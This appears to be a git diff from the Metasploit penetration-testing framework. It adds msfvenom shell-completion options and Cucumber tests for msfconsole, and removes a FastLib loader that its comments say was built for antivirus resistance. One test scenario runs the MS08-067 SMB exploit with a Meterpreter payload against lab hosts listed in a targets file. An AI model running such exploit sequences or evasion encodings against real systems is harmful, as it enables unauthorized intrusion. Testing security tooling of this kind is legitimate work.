+  {-a,--arch}"[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
+  {-b,--bad-chars}"[The list of characters to avoid, example: '\x00\xff']:bad characters" \
+  {-c,--add-code}"[Specify an additional win32 shellcode file to include]:shellcode file:_files" \
+  {-e,--encoder}"[The encoder to use]:encoder:_msfvenom_encoder" \
+  {-f,--format}"[Output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
+  "--help-formats[List available formats]" \
+  {-h,--help}"[Help banner]" \
+  {-i,--iterations}"[The number of times to encode the payload]:iterations" \
+  {-k,--keep}"[Preserve the template behavior and inject the payload as a new thread]" \
+  {-l,--list}"[List a module type]:module type:(all encoders nops payloads)" \
+  {-n,--nopsled}"[Prepend a nopsled of length size on to the payload]:nopsled length" \
+  {-o,--options}"[List the payload's standard options]" \
+  "--platform[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
+  {-p,--payload}"[Payload to use. Specify a '-' or stdin to use custom payloads]:payload" \
+  {-s,--space}"[The maximum size of the resulting payload]:length" \
+  {-x,--template}"[Specify an alternate executable template]:template file:_files"
@@ -0,0 +1,78 @@
+Feature: Help command
+  
+  Background:
+    Given I run `msfconsole` interactively
+    And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp"
+    
+  Scenario: The 'help' command's output
+    When I type "help"
+    And I type "exit"
+    Then the output should contain:
+      """
+      Core Commands
+      =============
+
+          Command       Description
+          -------       -----------
+          ?             Help menu
+          back          Move back from the current context
+          banner        Display an awesome metasploit banner
+          cd            Change the current working directory
+          color         Toggle color
+          connect       Communicate with a host
+          edit          Edit the current module with $VISUAL or $EDITOR
+          exit          Exit the console
+          go_pro        Launch Metasploit web GUI
+          grep          Grep the output of another command
+          help          Help menu
+          info          Displays information about one or more module
+          irb           Drop into irb scripting mode
+          jobs          Displays and manages jobs
+          kill          Kill a job
+          load          Load a framework plugin
+          loadpath      Searches for and loads modules from a path
+          makerc        Save commands entered since start to a file
+          popm          Pops the latest module off the stack and makes it active
+          previous      Sets the previously loaded module as the current module
+          pushm         Pushes the active or list of modules onto the module stack
+          quit          Exit the console
+          reload_all    Reloads all modules from all defined module paths
+          resource      Run the commands stored in a file
+          route         Route traffic through a session
+          save          Saves the active datastores
+          search        Searches module names and descriptions
+          sessions      Dump session listings and display information about sessions
+          set           Sets a variable to a value
+          setg          Sets a global variable to a value
+          show          Displays modules of a given type, or all modules
+          sleep         Do nothing for the specified number of seconds
+          spool         Write console output into a file as well the screen
+          threads       View and manipulate background threads
+          unload        Unload a framework plugin
+          unset         Unsets one or more variables
+          unsetg        Unsets one or more global variables
+          use           Selects a module by name
+          version       Show the framework and console library version numbers
+
+
+      Database Backend Commands
+      =========================
+
+          Command           Description
+          -------           -----------
+          creds             List all credentials in the database
+          db_connect        Connect to an existing database
+          db_disconnect     Disconnect from the current database instance
+          db_export         Export a file containing the contents of the database
+          db_import         Import a scan result file (filetype will be auto-detected)
+          db_nmap           Executes nmap and records the output automatically
+          db_rebuild_cache  Rebuilds the database-stored module cache
+          db_status         Show the current database status
+          hosts             List all hosts in the database
+          loot              List all loot in the database
+          notes             List all notes in the database
+          services          List all services in the database
+          vulns             List all vulnerabilities in the database
+          workspace         Switch between database workspaces
+      """
+  
@@ -0,0 +1,181 @@
+@wip
+Feature: MS08-067 netapi
+
+  Background:
+    Given a directory named "home"
+    And I cd to "home"
+    And a mocked home directory
+    Given I run `msfconsole` interactively
+    And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp"
+    
+  Scenario: The MS08-067 Module should have the following options
+    When I type "use exploit/windows/smb/ms08_067_netapi"
+    And I type "show options"
+    And I type "exit"
+    Then the output should contain:
+      """
+      Module options (exploit/windows/smb/ms08_067_netapi):
+
+         Name     Current Setting  Required  Description
+         ----     ---------------  --------  -----------
+         RHOST                     yes       The target address
+         RPORT    445              yes       Set the SMB service port
+         SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
+
+
+      Exploit target:
+
+         Id  Name
+         --  ----
+         0   Automatic Targeting
+      
+      """
+
+  Scenario: The MS08-067 Module should have the following advanced options
+    When I type "use exploit/windows/smb/ms08_067_netapi"
+    And I type "show advanced"
+    And I type "exit"
+    Then the output should contain:
+      """
+      Module advanced options:
+
+         Name           : CHOST
+         Current Setting: 
+         Description    : The local client address
+
+         Name           : CPORT
+         Current Setting: 
+         Description    : The local client port
+
+         Name           : ConnectTimeout
+         Current Setting: 10
+         Description    : Maximum number of seconds to establish a TCP connection
+
+         Name           : ContextInformationFile
+         Current Setting: 
+         Description    : The information file that contains context information
+
+         Name           : DCERPC::ReadTimeout
+         Current Setting: 10
+         Description    : The number of seconds to wait for DCERPC responses
+
+         Name           : DisablePayloadHandler
+         Current Setting: false
+         Description    : Disable the handler code for the selected payload
+
+         Name           : EnableContextEncoding
+         Current Setting: false
+         Description    : Use transient context when encoding payloads
+
+         Name           : NTLM::SendLM
+         Current Setting: true
+         Description    : Always send the LANMAN response (except when NTLMv2_session is 
+            specified)
+
+         Name           : NTLM::SendNTLM
+         Current Setting: true
+         Description    : Activate the 'Negotiate NTLM key' flag, indicating the use of 
+            NTLM responses
+
+         Name           : NTLM::SendSPN
+         Current Setting: true
+         Description    : Send an avp of type SPN in the ntlmv2 client Blob, this allow 
+            authentification on windows Seven/2008r2 when SPN is required
+
+         Name           : NTLM::UseLMKey
+         Current Setting: false
+         Description    : Activate the 'Negotiate Lan Manager Key' flag, using the LM key 
+            when the LM response is sent
+
+         Name           : NTLM::UseNTLM2_session
+         Current Setting: true
+         Description    : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a 
+            NTLMv2_session
+
+         Name           : NTLM::UseNTLMv2
+         Current Setting: true
+         Description    : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key 
+            is true
+
+         Name           : Proxies
+         Current Setting: 
+         Description    : Use a proxy chain
+
+         Name           : SMB::ChunkSize
+         Current Setting: 500
+         Description    : The chunk size for SMB segments, bigger values will increase 
+            speed but break NT 4.0 and SMB signing
+
+         Name           : SMB::Native_LM
+         Current Setting: Windows 2000 5.0
+         Description    : The Native LM to send during authentication
+
+         Name           : SMB::Native_OS
+         Current Setting: Windows 2000 2195
+         Description    : The Native OS to send during authentication
+
+         Name           : SMB::VerifySignature
+         Current Setting: false
+         Description    : Enforces client-side verification of server response signatures
+
+         Name           : SMBDirect
+         Current Setting: true
+         Description    : The target port is a raw SMB service (not NetBIOS)
+
+         Name           : SMBDomain
+         Current Setting: .
+         Description    : The Windows domain to use for authentication
+
+         Name           : SMBName
+         Current Setting: *SMBSERVER
+         Description    : The NetBIOS hostname (required for port 139 connections)
+
+         Name           : SMBPass
+         Current Setting: 
+         Description    : The password for the specified username
+
+         Name           : SMBUser
+         Current Setting: 
+         Description    : The username to authenticate as
+
+         Name           : SSL
+         Current Setting: false
+         Description    : Negotiate SSL for outgoing connections
+
+         Name           : SSLCipher
+         Current Setting: 
+         Description    : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
+
+         Name           : SSLVerifyMode
+         Current Setting: PEER
+         Description    : SSL verification method (accepted: CLIENT_ONCE, 
+            FAIL_IF_NO_PEER_CERT, NONE, PEER)
+
+         Name           : SSLVersion
+         Current Setting: SSL3
+         Description    : Specify the version of SSL that should be used (accepted: SSL2, 
+            SSL3, TLS1)
+
+         Name           : VERBOSE
+         Current Setting: false
+         Description    : Enable detailed status messages
+
+         Name           : WORKSPACE
+         Current Setting: 
+         Description    : Specify the workspace for this module
+
+         Name           : WfsDelay
+         Current Setting: 0
+         Description    : Additional delay when waiting for a session
+      """
+
+  @targets
+  Scenario: Show RHOST/etc variable expansion from a config file
+    When I type "use exploit/windows/smb/ms08_067_netapi"
+    When RHOST is WINDOWS
+    And I type "set PAYLOAD windows/meterpreter/bind_tcp"
+    And I type "show options"
+    And I type "run"
+    And I type "exit"
+    And I type "exit"
+    Then the output should match /spider-wxp/
@@ -0,0 +1,167 @@
+@boot
+Feature: `msfconsole` `database.yml`
+
+  In order to connect to the database in `msfconsole`
+  As a user calling `msfconsole` from a terminal
+  I want to be able to set the path of the `database.yml` in one of 4 locations (in order of precedence):
+
+  1. An explicit argument to the `-y` flag to `msfconsole`
+  2. The MSF_DATABASE_CONFIG environment variable
+  3. The user's `~/.msf4/database.yml`
+  4. `config/database.yml` in the metasploit-framework checkout location.
+
+  Scenario: With all 4 locations, --yaml wins
+    Given a file named "command_line.yml" with:
+      """
+      test:
+        adapter: postgresql
+        database: command_line_metasploit_framework_test
+        username: command_line_metasploit_framework_test
+      """
+    And a file named "msf_database_config.yml" with:
+      """
+      test:
+        adapter: postgresql
+        database: environment_metasploit_framework_test
+        username: environment_metasploit_framework_test
+      """
+    And I set the environment variables to:
+      | variable            | value                   |
+      | MSF_DATABASE_CONFIG | msf_database_config.yml |
+    And a directory named "home"
+    And I cd to "home"
+    And a mocked home directory
+    And a directory named ".msf4"
+    And I cd to ".msf4"
+    And a file named "database.yml" with:
+      """
+      test:
+        adapter: postgresql
+        database: user_metasploit_framework_test
+        username: user_metasploit_framework_test
+      """
+    And I cd to "../.."
+    And the project "database.yml" exists with:
+      """
+      test:
+        adapter: postgresql
+        database: project_metasploit_framework_test
+        username: project_metasploit_framework_test
+      """
+    When I run `msfconsole --environment test --yaml command_line.yml` interactively
+    And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp"
+    And I type "exit"
+    Then the output should contain "command_line_metasploit_framework_test"
+
+  Scenario: Without --yaml, MSF_DATABASE_CONFIG wins
+    Given a file named "msf_database_config.yml" with:
+      """
+      test:
+        adapter: postgresql
+        database: environment_metasploit_framework_test
+        username: environment_metasploit_framework_test
+      """
+    And I set the environment variables to:
+      | variable            | value                   |
+      | MSF_DATABASE_CONFIG | msf_database_config.yml |
+    And a directory named "home"
+    And I cd to "home"
+    And a mocked home directory
+    And a directory named ".msf4"
+    And I cd to ".msf4"
+    And a file named "database.yml" with:
+      """
+      test:
+        adapter: postgresql
+        database: user_metasploit_framework_test
+        username: user_metasploit_framework_test
+      """
+    And I cd to "../.."
+    And the project "database.yml" exists with:
+      """
+      test:
+        adapter: postgresql
+        database: project_metasploit_framework_test
+        username: project_metasploit_framework_test
+      """
+    When I run `msfconsole --environment test` interactively
+    And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp"
+    And I type "exit"
+    Then the output should contain "environment_metasploit_framework_test"
+
+  Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins
+    Given I unset the environment variables:
+      | variable            |
+      | MSF_DATABASE_CONFIG |
+    And a directory named "home"
+    And I cd to "home"
+    And a mocked home directory
+    And a directory named ".msf4"
+    And I cd to ".msf4"
+    And a file named "database.yml" with:
+      """
+      test:
+        adapter: postgresql
+        database: user_metasploit_framework_test
+        username: user_metasploit_framework_test
+      """
+    And I cd to "../.."
+    And the project "database.yml" exists with:
+      """
+      test:
+        adapter: postgresql
+        database: project_metasploit_framework_test
+        username: project_metasploit_framework_test
+      """
+    When I run `msfconsole --environment test` interactively
+    And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp"
+    And I type "exit"
+    Then the output should contain "user_metasploit_framework_test"
+
+  Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins
+    Given I unset the environment variables:
+      | variable            |
+      | MSF_DATABASE_CONFIG |
+    And a directory named "home"
+    And I cd to "home"
+    And a mocked home directory
+    And I cd to "../.."
+    And the project "database.yml" exists with:
+      """
+      test:
+        adapter: postgresql
+        database: project_metasploit_framework_test
+        username: project_metasploit_framework_test
+      """
+    When I run `msfconsole --environment test` interactively
+    And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp"
+    And I type "exit"
+    Then the output should contain "project_metasploit_framework_test"
+
+
+  Scenario: Without --yaml, MSF_DATABASE_CONFIG, ~/.msf4/database.yml, or project "database.yml", no database connection
+    Given I unset the environment variables:
+      | variable            |
+      | MSF_DATABASE_CONFIG |
+    And a directory named "home"
+    And I cd to "home"
+    And a mocked home directory
+    And I cd to "../.."
+    And the project "database.yml" does not exist
+    When I run `msfconsole --environment test` interactively
+    And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp"
+    And I type "db_status"
+    And I type "exit"
+    Then the output should not contain "command_line_metasploit_framework_test"
+    And the output should not contain "environment_metasploit_framework_test"
+    And the output should not contain "user_metasploit_framework_test"
+    And the output should not contain "project_metasploit_framework_test"
+    And the output should contain "[*] postgresql selected, no connection"
+    
+  Scenario: Starting `msfconsole` with a valid database.yml
+    Given I run `msfconsole` interactively
+    And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp"
+    When I type "db_status"
+    And I type "exit"
+    Then the output should contain "[*] postgresql connected to metasploit_framework_test"
+  
@@ -0,0 +1,20 @@
+Given /^I unset the environment variables:$/ do |table|
+  table.hashes.each do |row|
+    variable = row['variable'].to_s.upcase
+
+    # @todo add extension to Announcer
+    announcer.instance_eval do
+      if @options[:env]
+        print "$ unset #{variable}"
+      end
+    end
+
+    current_value = ENV.delete(variable)
+
+    # if original_env already has the key, then the true original was already recorded from a previous unset or set,
+    # so don't record the current value as it will cause ENV not to be restored after the Scenario.
+    unless original_env.key? variable
+      original_env[variable] = current_value
+    end
+  end
+end
@@ -0,0 +1,14 @@
+require 'metasploit/framework/database/cucumber'
+
+Given /^the project "database.yml" does not exist$/ do
+  Metasploit::Framework::Database::Cucumber.backup_project_configurations
+end
+
+Given /^the project "database.yml" exists with:$/ do |file_content|
+  Metasploit::Framework::Database::Cucumber.backup_project_configurations
+  write_file(Metasploit::Framework::Database::Cucumber.project_configurations_path, file_content)
+end
+
+After do
+  Metasploit::Framework::Database::Cucumber.restore_project_configurations
+end
@@ -0,0 +1,10 @@
+When /^targets are loaded$/ do
+  config_file = File.expand_path('features/support/targets.yml')
+  fail "Target config file #{config_file} does not exist" unless File.exists?(config_file)
+  @target_config = YAML.load_file(config_file)
+end
+
+When /^(RHOSTS?) (?:are|is) (\S+)$/ do |type, target_type|
+  fail "No target type #{target_type}" unless @target_config.key?(target_type)
+  step "I type \"set #{type} #{@target_config[target_type]}\""
+end
@@ -0,0 +1,26 @@
+#!/usr/bin/env ruby
+
+case ARGV[0]
+  when 'size'
+    puts "30 134"
+  when '-a'
+    puts <<EOS
+speed 38400 baud; 30 rows; 134 columns;
+lflags: icanon isig iexten echo echoe echok echoke -echonl echoctl
+	-echoprt -altwerase -noflsh -tostop -flusho pendin -nokerninfo
+	-extproc
+iflags: -istrip icrnl -inlcr -igncr ixon -ixoff ixany imaxbel iutf8
+	-ignbrk brkint -inpck -ignpar -parmrk
+oflags: opost onlcr -oxtabs -onocr -onlret
+cflags: cread cs8 -parenb -parodd hupcl -clocal -cstopb -crtscts -dsrflow
+	-dtrflow -mdmbuf
+cchars: discard = ^O; dsusp = ^Y; eof = ^D; eol = <undef>;
+	eol2 = <undef>; erase = ^?; intr = ^C; kill = ^U; lnext = ^V;
+	min = 1; quit = ^\; reprint = ^R; start = ^Q; status = ^T;
+	stop = ^S; susp = ^Z; time = 0; werase = ^W;
+EOS
+  when '-g'
+    puts "gfmt1:cflag=4b00:iflag=6b02:lflag=200005cf:oflag=3:discard=f:dsusp=19:eof=4:eol=ff:eol2=ff:erase=7f:intr=3:kill=15:lnext=16:min=1:quit=1c:reprint=12:start=11:status=14:stop=13:susp=1a:time=0:werase=17:ispeed=38400:ospeed=38400"
+end
+
+exit 0
@@ -0,0 +1,31 @@
+# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
+# It is recommended to regenerate this file in the future when you upgrade to a 
+# newer version of cucumber-rails. Consider adding your own code to a new file 
+# instead of editing this one. Cucumber will automatically load all features/**/*.rb
+# files.
+
+require 'cucumber/rails'
+require 'aruba/cucumber'
+
+# Capybara defaults to XPath selectors rather than Webrat's default of CSS3. In
+# order to ease the transition to Capybara we set the default here. If you'd
+# prefer to use XPath just remove this line and adjust any selectors in your
+# steps to use the XPath syntax.
+Capybara.default_selector = :css
+
+# By default, any exception happening in your Rails application will bubble up
+# to Cucumber so that your scenario will fail. This is a different from how 
+# your application behaves in the production environment, where an error page will 
+# be rendered instead.
+#
+# Sometimes we want to override this default behaviour and allow Rails to rescue
+# exceptions and display an error page (just like when the app is running in production).
+# Typical scenarios where you want to do this is when you test your error pages.
+# There are two ways to allow Rails to rescue exceptions:
+#
+# 1) Tag your scenario (or feature) with @allow-rescue
+#
+# 2) Set the value below to true. Beware that doing this globally is not
+# recommended as it will mask a lot of errors for you!
+#
+ActionController::Base.allow_rescue = false
@@ -0,0 +1,5 @@
+Before do
+  set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
+  set_env('RAILS_ENV', 'test')
+  @aruba_timeout_seconds = 4.minutes
+end
@@ -0,0 +1,11 @@
+require 'pathname'
+
+support = Pathname.new(__FILE__).realpath.parent
+
+paths = [
+    # adds support/bin at the front of the path so that the support/bin/stty script will be used to fake system stty
+    # output.
+    support.join('bin').to_path,
+    ENV['PATH']
+]
+ENV['PATH'] = paths.join(File::PATH_SEPARATOR)
@@ -0,0 +1,2 @@
+WINDOWS: spider-wxp.vuln.lax.rapid7.com
+LINUX: spider-ubuntu.vuln.lax.rapid7.com
@@ -1,433 +0,0 @@
-#!/usr/bin/env ruby
-# -*- coding: binary -*-
-
-#
-# FASTLIB is a mechanism for loading large sets of libraries in a way that is
-# faster and much more flexible than typical disk structures. FASTLIB includes
-# hooks that can be used for both compression and encoding of Ruby libraries.
-#
-
-#
-# This format was specifically created to improve the performance and
-# AV-resistance of the Metasploit Framework and Rex libraries.
-#
-
-
-#
-# This library is still in its early form; a large number of performance and
-# compatiblity improvements are not yet included. Do not depend on the FASTLIB
-# file format at this time.
-#
-
-require "find"
-
-
-#
-# Copyright (C) 2011 Rapid7. You can redistribute it and/or
-# modify it under the terms of the ruby license.
-#
-#
-# Roughly based on the rubyzip zip/ziprequire library:
-# 	>> Copyright (C) 2002 Thomas Sondergaard
-# 	>> rubyzip is free software; you can redistribute it and/or
-# 	>> modify it under the terms of the ruby license.
-
-
-#
-# The FastLib class implements the meat of the FASTLIB archive format
-#
-class FastLib
-
-  VERSION = "0.0.8"
-
-  FLAG_COMPRESS = 0x01
-  FLAG_ENCRYPT  = 0x02
-
-  @@cache = {}
-  @@has_zlib = false
-
-  #
-  # Load zlib support if possible
-  #
-  begin
-    require 'zlib'
-    @@has_zlib = true
-  rescue ::LoadError
-  end
-
-  #
-  # This method returns the version of the fastlib library
-  #
-  def self.version
-    VERSION
-  end
-
-  #
-  # This method loads content from a specific archive file by name. If the
-  # noprocess argument is set to true, the contents will not be expanded to
-  # include workarounds for things such as __FILE__. This is useful when
-  # loading raw binary data where these strings may occur
-  #
-  def self.load(lib, name, noprocess=false)
-    data = ""
-    load_cache(lib)
-
-    return unless ( @@cache[lib] and @@cache[lib][name] )
-
-
-    ::File.open(lib, "rb") do |fd|
-      fd.seek(
-        @@cache[lib][:fastlib_header][0] +
-        @@cache[lib][:fastlib_header][1] +
-        @@cache[lib][name][0]
-      )
-      data = fastlib_filter_decode( lib, fd.read(@@cache[lib][name][1] ))
-    end
-
-    # Return the contents in raw or processed form
-    noprocess ? data : post_process(lib, name, data)
-  end
-
-  #
-  # This method caches the file list and offsets within the archive
-  #
-  def self.load_cache(lib)
-    return if @@cache[lib]
-    @@cache[lib] = {}
-
-    return if not ::File.exists?(lib)
-
-    ::File.open(lib, 'rb') do |fd|
-      dict = {}
-      head = fd.read(4)
-      return if head != "FAST"
-      hlen = fd.read(4).unpack("N")[0]
-      flag = fd.read(4).unpack("N")[0]
-
-      @@cache[lib][:fastlib_header] = [12, hlen, fd.stat.mtime.utc.to_i ]
-      @@cache[lib][:fastlib_flags]  = flag
-
-      nlen, doff, dlen, tims = fd.read(16).unpack("N*")
-
-      while nlen > 0
-        name = fastlib_filter_decode( lib, fd.read(nlen) )
-        dict[name] = [doff, dlen, tims]
-
-        nlen, doff, dlen, tims = fd.read(16).unpack("N*")
-      end
-
-      @@cache[lib].merge!(dict)
-    end
-
-  end
-
-  #
-  # This method provides compression and encryption capabilities
-  # for the fastlib archive format.
-  #
-  def self.fastlib_filter_decode(lib, buff)
-
-    if (@@cache[lib][:fastlib_flags] & FLAG_ENCRYPT) != 0
-
-      @@cache[lib][:fastlib_decrypt] ||= ::Proc.new do |data|
-        stub = "decrypt_%.8x" % ( @@cache[lib][:fastlib_flags] & 0xfffffff0 )
-        FastLib.send(stub, data)
-      end
-
-      buff = @@cache[lib][:fastlib_decrypt].call( buff )
-    end
-
-    if (@@cache[lib][:fastlib_flags] & FLAG_COMPRESS) != 0
-      if not @@has_zlib
-        raise ::RuntimeError, "zlib is required to open this archive"
-      end
-
-      z = Zlib::Inflate.new
-      buff = z.inflate(buff)
-      buff << z.finish
-      z.close
-    end
-
-    buff
-  end
-
-  #
-  # This method provides compression and encryption capabilities
-  # for the fastlib archive format.
-  #
-  def self.fastlib_filter_encode(lib, buff)
-
-    if (@@cache[lib][:fastlib_flags] & FLAG_COMPRESS) != 0
-      if not @@has_zlib
-        raise ::RuntimeError, "zlib is required to open this archive"
-      end
-
-      z = Zlib::Deflate.new
-      buff = z.deflate(buff)
-      buff << z.finish
-      z.close
-    end
-
-    if (@@cache[lib][:fastlib_flags] & FLAG_ENCRYPT) != 0
-
-      @@cache[lib][:fastlib_encrypt] ||= ::Proc.new do |data|
-        stub = "encrypt_%.8x" % ( @@cache[lib][:fastlib_flags] & 0xfffffff0 )
-        FastLib.send(stub, data)
-      end
-
-      buff = @@cache[lib][:fastlib_encrypt].call( buff )
-    end
-
-    buff
-  end
-
-
-  # This method provides a way to create a FASTLIB archive programatically.
-  #
-  # @param [String] lib the output path for the archive
-  # @param [String] flag a string containing the hex values for the
-  #   flags ({FLAG_COMPRESS} and {FLAG_ENCRYPT}).
-  # @param [String] bdir the path to the base directory which will be
-  #   stripped from all paths included in the archive
-  # @param [Array<String>] dirs list of directories/files to pack into
-  #   the archive.  All dirs should be under bdir so that the paths are
-  #   stripped correctly.
-  # @return [void]
-  def self.dump(lib, flag, bdir, *dirs)
-    head = ""
-    data = ""
-    hidx = 0
-    didx = 0
-
-    bdir = bdir.gsub(/\/$/, '')
-    brex = /^#{Regexp.escape(bdir)}\//
-
-    @@cache[lib] = {
-      :fastlib_flags => flag.to_i(16)
-    }
-
-    dirs.each do |dir|
-      ::Find.find(dir) do |path|
-        next if not ::File.file?(path)
-        name = fastlib_filter_encode( lib, path.sub( brex, "" ) )
-
-        buff = ""
-        ::File.open(path, "rb") do |fd|
-          buff = fastlib_filter_encode(lib, fd.read(fd.stat.size))
-        end
-
-
-        head << [ name.length, didx, buff.length, ::File.stat(path).mtime.utc.to_i ].pack("NNNN")
-        head << name
-        hidx = hidx + 16 + name.length
-
-        data << buff
-        didx = didx + buff.length
-      end
-    end
-
-    head << [0,0,0].pack("NNN")
-
-    ::File.open(lib, "wb") do |fd|
-      fd.write("FAST")
-      fd.write( [ head.length, flag.to_i(16) ].pack("NN") )
-      fd.write( head )
-      fd.write( data )
-    end
-  end
-
-  #
-  # This archive provides a way to list the contents of an archive
-  # file, returning the names only in sorted order.
-  #
-  def self.list(lib)
-    load_cache(lib)
-    ( @@cache[lib] || {} ).keys.map{|x| x.to_s }.sort.select{ |x| @@cache[lib][x] }
-  end
-
-  #
-  # This method is called on the loaded is required to expand __FILE__
-  # and other inline dynamic constants to map to the correct location.
-  #
-  def self.post_process(lib, name, data)
-    data.gsub('__FILE__', "'#{ ::File.expand_path(::File.join(::File.dirname(lib), name)) }'")
-  end
-
-  #
-  # This is a stub crypto handler that performs a basic XOR
-  # operation against a fixed one byte key. The two usable IDs
-  # are 12345600 and 00000000
-  #
-  def self.encrypt_12345600(data)
-    encrypt_00000000(data)
-  end
-
-  def self.decrypt_12345600(data)
-    encrypt_00000000(data)
-  end
-
-  def self.encrypt_00000000(data)
-    data.unpack("C*").map{ |c| c ^ 0x90 }.pack("C*")
-  end
-
-  def self.decrypt_00000000(data)
-    encrypt_00000000(data)
-  end
-
-  #
-  # Expose the cache to callers
-  #
-  def self.cache
-    @@cache
-  end
-end
-
-
-#
-# Allow this library to be used as an executable to create and list
-# FASTLIB archives
-#
-if __FILE__ == $0
-  cmd = ARGV.shift
-  unless ["store", "list", "version"].include?(cmd)
-    $stderr.puts "Usage: #{$0} [dump|list|version] <arguments>"
-    exit(0)
-  end
-
-  case cmd
-  when "store"
-    dst = ARGV.shift
-    flg = ARGV.shift
-    dir = ARGV.shift
-    src = ARGV
-    unless dst and dir and src.length > 0
-      $stderr.puts "Usage: #{$0} store destination.fastlib flags base_dir src1 src2 ... src99"
-      exit(0)
-    end
-    FastLib.dump(dst, flg, dir, *src)
-
-  when "list"
-    src = ARGV.shift
-    unless src
-      $stderr.puts "Usage: #{$0} list"
-      exit(0)
-    end
-    $stdout.puts "Library: #{src}"
-    $stdout.puts "====================================================="
-    FastLib.list(src).each do |name|
-      fsize = FastLib.cache[src][name][1]
-      ftime = ::Time.at(FastLib.cache[src][name][2]).strftime("%Y-%m-%d %H:%M:%S")
-      $stdout.puts sprintf("%9d\t%20s\t%s\n", fsize, ftime, name)
-    end
-    $stdout.puts ""
-
-  when "version"
-    $stdout.puts "FastLib Version #{FastLib.version}"
-  end
-
-  exit(0)
-end
-
-#
-# FASTLIB archive format (subject to change without notice)
-#
-=begin
-
-  * All integers are 32-bit and in network byte order (big endian / BE)
-  * The file signature is 0x46415354 (big endian, use htonl() if necessary)
-  * The header is always 12 bytes into the archive (magic + header length)
-  * The data section is always 12 + header length into the archive
-  * The header entries always start with 'fastlib_header'
-  * The header entries always consist of 16 bytes + name length (no alignment)
-  * The header name data may be encoded, compressed, or transformed
-  * The data entries may be encoded, compressed, or transformed too
-
-
-  4 bytes: "FAST"
-  4 bytes: NBO header length
-  4 bytes: NBO flags (24-bit crypto ID, 8 bit modes)
-  [
-    4 bytes: name length (0 = End of Names)
-    4 bytes: data offset
-    4 bytes: data length
-    4 bytes: timestamp
-  ]
-  [ Raw Data ]
-
-=end
-
-
-module Kernel #:nodoc:all
-  alias :fastlib_original_require :require
-
-  #
-  # Store the CWD when were initially loaded
-  # required for resolving relative paths
-  #
-  @@fastlib_base_cwd = ::Dir.pwd
-
-  #
-  # This method hooks the original Kernel.require to support
-  # loading files within FASTLIB archives
-  #
-  def require(name)
-    fastlib_require(name) || fastlib_original_require(name)
-  end
-
-  #
-  # This method handles the loading of FASTLIB archives
-  #
-  def fastlib_require(name)
-    if name.respond_to? :to_path
-      name = name.to_path
-    end
-
-    name = name + ".rb" if not name =~ /\.rb$/
-    return false if fastlib_already_loaded?(name)
-    return false if fastlib_already_tried?(name)
-
-    # XXX Implement relative search paths within archives
-    $:.map{ |path|
-      (path =~ /^([A-Za-z]\:|\/)/ ) ? path : ::File.expand_path( ::File.join(@@fastlib_base_cwd, path) )
-    }.map{  |path| ::Dir["#{path}/*.fastlib"] }.flatten.uniq.each do |lib|
-      data = FastLib.load(lib, name)
-      next if not data
-      $" << name
-
-      Object.class_eval(data, lib + "::" + name)
-
-      return true
-    end
-
-    $fastlib_miss << name
-
-    false
-  end
-
-  #
-  # This method determines whether the specific file name
-  # has already been loaded ($LOADED_FEATURES aka $")
-  #
-  def fastlib_already_loaded?(name)
-    re = Regexp.new("^" + Regexp.escape(name) + "$")
-    $".detect { |e| e =~ re } != nil
-  end
-
-  #
-  # This method determines whether the specific file name
-  # has already been attempted with the included FASTLIB
-  # archives.
-  #
-  # TODO: Ensure that this only applies to known FASTLIB
-  #       archives and that newly included archives will
-  #       be searched appropriately.
-  #
-  def fastlib_already_tried?(name)
-    $fastlib_miss ||= []
-    $fastlib_miss.include?(name)
-  end
-end
-
-
-
-
@@ -879,19 +879,20 @@ class CCompiler < C::Compiler
      r = c_cexpr_inner(expr.rexpr)
      r = make_volatile(r, expr.type) if r.kind_of? ModRM and l.kind_of? ModRM
      r = make_volatile(r, expr.type) if r.kind_of?(ModRM) and r.sz != l.sz
-      l = make_volatile(l, expr.type) if l.kind_of?(ModRM)
+      l = make_volatile(l, expr.type) if l.kind_of?(ModRM) and r.kind_of?(Reg) and r.sz != l.sz
      if l.kind_of? Expression
        o = { :< => :>, :> => :<, :>= => :<=, :<= => :>= }[o] || o
        l, r = r, l
      end
-      unuse l, r
      if expr.lexpr.type.integral? or expr.lexpr.type.pointer?
-        r = Reg.new(r.val, l.sz) if r.kind_of? Reg and r.sz != l.sz	# XXX
-        instr 'cmp', l, i_to_i32(r)
+        rr = i_to_i32(r)
+        rr = Reg.new(rr.val, l.sz) if rr.kind_of? Reg and rr.sz != l.sz	# XXX
+        instr 'cmp', l, rr
      elsif expr.lexpr.type.float?
        raise 'float unhandled'
      else raise 'bad comparison ' + expr.to_s
      end
+      unuse l, r
      op = 'j' + getcc(o, expr.lexpr.type)
      instr op, Expression[target]
    when :'!'
@@ -9,6 +9,7 @@ require 'active_support'
 require 'bcrypt'
 require 'json'
 require 'msgpack'
+require 'metasploit/concern'
 require 'metasploit/model'
 require 'nokogiri'
 require 'packetfu'
@@ -60,11 +60,6 @@ class Metasploit::Framework::Command::Base
    # the configuration from the parsed options.
    parsed_options.configure(Rails.application)

-    # support disabling the database
-    unless parsed_options.options.database.disable
-      Metasploit::Framework::Require.optionally_active_record_railtie
-    end
-
    Rails.application.require_environment!

    parsed_options
